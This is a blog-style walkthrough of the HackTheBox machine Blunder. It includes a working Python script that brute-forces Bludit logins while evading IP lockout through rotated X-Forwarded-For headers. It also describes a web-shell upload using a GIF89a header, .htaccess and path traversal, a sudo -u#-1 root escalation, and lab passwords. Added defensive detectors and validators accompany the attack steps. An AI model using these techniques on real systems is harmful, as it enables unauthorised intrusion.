Blunder: Hackthebox Walkthrough

Hey all! In this blog post, we'll be walking through Blunder from HackTheBox. Blunder is an easy-level Linux machine.

Summary

The initial foothold on the box requires a bit of enumeration to find the correct user who can log into the CMS, Bludit. There is a file upload vulnerability in the CMS that gives us the initial shell on the box. With further enumeration, we find the password for a user on the box. Privilege escalation to root is pretty simple, as we only need to identify the sudo privileges granted to that user.

With all that said, let's get started.

Starting with the nmap scan, I found port 80 to be open, whereas port 21 (FTP) was filtered, so it is of no use.

# nmap -sC -sV -oA blunder.nmap 10.10.10.191

Next, I browsed to http://10.10.10.191 and a page loaded.

Cool! Scrolling through the contents, I found that it is a kind of blog page.

The About page read much like a riddle.

I launched a gobuster scan against the host:

# gobuster dir --url  http://10.10.10.191   -t 50  -w /usr/share/seclists/Discovery/Web-Content/big.txt -o gobuster.out

Looking at the output, /admin seemed interesting, so I went straight to http://10.10.10.191/admin, where there was a login page.

The page title mentioned Bludit, so I googled it. It turned out to be a CMS. I searched for exploits for this CMS.

The two results were authenticated attacks, so they were of no use yet. Googling for Bludit exploits took me to https://github.com/bludit/bludit/pull/1090. It was basically a brute force of the user's password. The affected version was 3.9.2, so I tried to check the version of Bludit installed on the box.

Searching Google for the Bludit GitHub repository shows its directory structure. From there, one can work out which directories are likely to be present on the CMS installation.

It is good practice to look up the GitHub repo of any CMS to check for useful directories and files.

I found the Bludit version inside /bl-themes/blogx/metadata.json: it was 3.9.2.

The problem now was that we did not know the username. Guessing admin would be lame. Maybe I was missing some directories or files that did not show up in the gobuster output.

So this time I ran gobuster with extension flags (php and txt) and used the SecLists common.txt as the wordlist.

# gobuster dir --url  http://10.10.10.191/ -t 50  -w /usr/share/seclists/Discovery/Web-Content/common.txt -o gobuster_dir1.out -x php,txt -s 200,204,401,403

Reading the contents of todo.txt revealed the user to be fergus.

I modified the script from the pull request to load a wordlist of my choice:

#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login.php'
username = 'fergus'
wordlist = []


def file_read(fname):
    # Read one candidate password per line into wordlist.
    with open(fname) as f:
        for line in f:
            wordlist.append(line.strip())
    print(wordlist)


file_read('password_index.txt')
# Add the correct password to the end of the list
wordlist.append('adminadmin')

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p=password))

    # The X-Forwarded-For value changes on every attempt; this is what defeats
    # Bludit's IP-based login lockout (the weakness reported in PR 1090).
    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers=headers, data=data, allow_redirects=False)

    # A redirect to the dashboard means the credentials were accepted.
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u=username, p=password))
            print()
            break

I tried a lot of wordlists to brute-force the password, but none of them worked. Finally I created a wordlist from the content of the website itself, which can be done using cewl.

# cewl http://10.10.10.191/ -w password_index.txt
# python exploit.py

And it worked, revealing the password to be RolandDeschain.
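From the defender's side, the script above is easy to spot in web-server logs once you key on the TCP peer address instead of the forwarded header the client controls. The following detection is an added example, not part of the original post or of Bludit; it assumes a combined log format extended with X-Forwarded-For as the last quoted field, and the sample lines are constructed.

```python
import re
from collections import defaultdict

# Combined log format plus the X-Forwarded-For header as a final quoted field
# (assumed log layout; constructed sample below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<xff>[^"]*)"$'
)


def find_login_bruteforce(lines, threshold=10):
    """Group login POSTs by the TCP peer address, ignoring X-Forwarded-For.

    Returns {peer_ip: {"attempts": n, "distinct_xff": m}} for peers at or over
    the threshold. Keying on the peer rather than X-Forwarded-For is the point:
    the brute-force script rotates that header on every request.
    """
    stats = defaultdict(lambda: {"attempts": 0, "xff": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than abort the whole run
        if m["method"] != "POST" or m["path"] != "/admin/login.php":
            continue
        entry = stats[m["ip"]]
        entry["attempts"] += 1
        entry["xff"].add(m["xff"])
    return {
        ip: {"attempts": s["attempts"], "distinct_xff": len(s["xff"])}
        for ip, s in stats.items() if s["attempts"] >= threshold
    }


# Constructed sample: twelve login POSTs from one peer, each with a different
# X-Forwarded-For value (what the script sends), plus benign traffic.
SAMPLE_LOG = [
    f'10.10.14.5 - - [11/Jul/2020:10:00:{i:02d} +0000] "POST /admin/login.php HTTP/1.1" '
    f'200 512 "http://10.10.10.191/admin/login.php" "Mozilla/5.0" "candidate{i}"'
    for i in range(12)
] + [
    '10.10.14.9 - - [11/Jul/2020:10:01:00 +0000] "GET /about HTTP/1.1" 200 2048 "-" "Mozilla/5.0" "-"',
    '10.10.14.9 - - [11/Jul/2020:10:01:05 +0000] "POST /admin/login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"',
]

if __name__ == "__main__":
    for ip, s in find_login_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {s['attempts']} login attempts across {s['distinct_xff']} forwarded addresses")
```

A high attempt count paired with many distinct forwarded addresses from a single peer is the signature of this particular lockout bypass, as opposed to an ordinary user mistyping a password.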

I quickly logged in to the CMS with the credentials.

There was a section to add new content.

This is where the image upload vulnerability found earlier with searchsploit applies. The issue is described here: https://github.com/bludit/bludit/issues/1081

The contents of the image are replaced with a PHP web shell. A GIF89a header at the beginning dupes the server into believing it is a GIF file. The exploit also tampers with the uuid parameter, setting it to ../../tmp/temp, so the malicious file is stored under /tmp/temp.

A crafted .htaccess file also has to be uploaded. Using AddType in a .htaccess file, one can register other extensions that PHP will be run from. In a nutshell, the .htaccess is used so that image.jpg is treated as image.php (the file will now execute commands).

Now that the .htaccess is uploaded, shell.php can be accessed at http://10.10.10.191/bl-content/tmp/shell.php (even if the extension of the shell is .jpg, the exploit will work). I grabbed a simple one-liner reverse shell from Pentest Monkey and started a listener on my local box.
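Every step of that chain (the tampered uuid, the .htaccess upload, the GIF89a polyglot and the .jpg-to-PHP mapping) maps to one missing server-side check. The validator below is an added example written for this post, not Bludit's code; the upload root path, the image whitelist and the test inputs are assumptions.

```python
import re
from pathlib import Path

# Assumed upload root (the exact path is an assumption for this example).
# Only these image types are accepted, each with its expected magic bytes.
UPLOAD_ROOT = Path("/var/www/bludit/bl-content/uploads")
IMAGE_MAGIC = {".gif": b"GIF8", ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff", ".png": b"\x89PNG"}
SAFE_SEGMENT = re.compile(r"[A-Za-z0-9_-]+")
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


def check_upload(uuid, filename, content, root=UPLOAD_ROOT):
    """Return (accepted, reason_or_destination).

    Each rejection corresponds to one step of the upload chain described above.
    """
    # 1. uuid becomes a directory name, so "../../tmp/temp" must not be accepted.
    if not SAFE_SEGMENT.fullmatch(uuid):
        return False, "uuid contains path or special characters"
    # 2. .htaccess (any dotfile) and path separators in the filename are refused,
    #    so AddType cannot be used to make .jpg files execute as PHP.
    name = Path(filename).name
    if name != filename or name.startswith("."):
        return False, "filename is a dotfile or contains a path"
    # 3. exactly one extension, from the image whitelist (rejects shell.php.jpg).
    suffixes = Path(name).suffixes
    if len(suffixes) != 1 or suffixes[0].lower() not in IMAGE_MAGIC:
        return False, "extension is not an allowed image type"
    ext = suffixes[0].lower()
    # 4. magic bytes must agree with the extension (GIF89a on a .jpg is a mismatch).
    if not content.startswith(IMAGE_MAGIC[ext]):
        return False, "content does not match the declared image type"
    # 5. a magic-byte check alone passes "GIF89a<?php ...", so refuse script markers.
    if any(marker in content for marker in SCRIPT_MARKERS):
        return False, "image data contains script markers"
    # 6. final containment check on the resolved destination path.
    dest = (root / uuid / name).resolve()
    if root.resolve() not in dest.parents:
        return False, "destination escapes the upload root"
    return True, str(dest)


if __name__ == "__main__":
    # Constructed inputs mirroring the tampered uuid and the polyglot image.
    print(check_upload("../../tmp/temp", "shell.gif", b"GIF89a"))
    print(check_upload("abc123", ".htaccess", b"AddType application/x-httpd-php .jpg"))
    print(check_upload("abc123", "photo.gif", b"GIF89a<?php echo 1; ?>"))
    print(check_upload("abc123", "photo.gif", b"GIF89a" + bytes(range(16))))
```

Storing accepted files under a server-generated name, outside any directory where .htaccess is honoured, closes the remaining gap even if a future polyglot slips past step 5.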

And got the initial foothold.

Getting the user.txt

I started enumerating with linpeas.sh but found nothing interesting. There were two users on the box, hugo and shaun, with hugo owning the user.txt.

Then I started manual enumeration and came across /var/www. There were two versions of Bludit present. On digging through them, I found the SHA1 password hash for hugo.

I used the online hash lookup service https://md5decrypt.net/en/ to crack the hash.

Now that I had the password, Password120, I ran su - hugo on the box.

I was hugo now, and user.txt could be grabbed.

Privilege escalation to root!!!

Upon initial enumeration, I found that sudo is present on the box, so I quickly ran sudo -l.

Hugo can run /bin/bash, but not as root! I searched for the exact string on Google and landed on an exploit: https://www.exploit-db.com/exploits/47502

Exploit description

Sudo does not check that the specified user ID exists and executes the command with an arbitrary user ID under the sudo privilege.
-u#-1 is interpreted as 0, which is root's ID,
and /bin/bash is executed with root permissions.
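The vulnerable ingredient is the combination of a negated Runas list like (ALL, !root) with a sudo release older than 1.8.28, the version that fixed this user-ID handling. The audit below is an added example, not code from the original post or from the sudo project; the sudoers lines are constructed to reflect the rule described above, and comment handling is simplified.

```python
import re

# Matches a user specification line such as "hugo ALL=(ALL, !root) /bin/bash".
SPEC_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")


def parse_version(v):
    """Turn '1.8.25p1' into (1, 8, 25) so versions compare numerically."""
    return tuple(int(x) for x in re.findall(r"\d+", v)[:3])


def audit_sudoers(lines, sudo_version):
    """Return one finding per user spec whose Runas list relies on a '!user'
    exclusion while sudo predates 1.8.28, the release that fixed the -u#-1 bypass.
    """
    findings = []
    vulnerable_sudo = parse_version(sudo_version) < (1, 8, 28)
    for line in lines:
        # Simplified: drop trailing comments (sudoers also uses '#' for #include).
        line = line.split("#", 1)[0].strip()
        m = SPEC_RE.match(line)
        if not m:
            continue
        runas = [r.strip() for r in m["runas"].split(",")]
        excluded = [r[1:] for r in runas if r.startswith("!")]
        if excluded and vulnerable_sudo:
            findings.append({
                "user": m["user"],
                "excluded": excluded,
                "commands": m["cmds"].strip(),
                "note": "negated Runas can be bypassed with -u#-1 on sudo < 1.8.28",
            })
    return findings


# Constructed sudoers lines reflecting the rule described above (not copied from the box).
SAMPLE_SUDOERS = [
    "# User privilege specification",
    "root    ALL=(ALL:ALL) ALL",
    "hugo    ALL=(ALL, !root) /bin/bash",
    "shaun   ALL=(www-data) /usr/bin/ls",
]

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS, "1.8.25p1"):
        print(f"{f['user']}: may run {f['commands']} as any user except {f['excluded']}; {f['note']}")
```

The durable fix is upgrading sudo; as a configuration rule, an explicit allow list of Runas users is safer than "everyone except root" regardless of version.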

Got root!!

That's all for the blog post!! Thanks for reading! For more such content visit here
See you in the next post. Until then, happy hunting!!

shreyapohekar

I am Shreya Pohekar. I love to build and break stuff. Currently, I'm working as an iOS and Angular developer. I am also a contributor to the CodeVigilant project. My blogs are focused on Infosec and Dev and their how-to's.
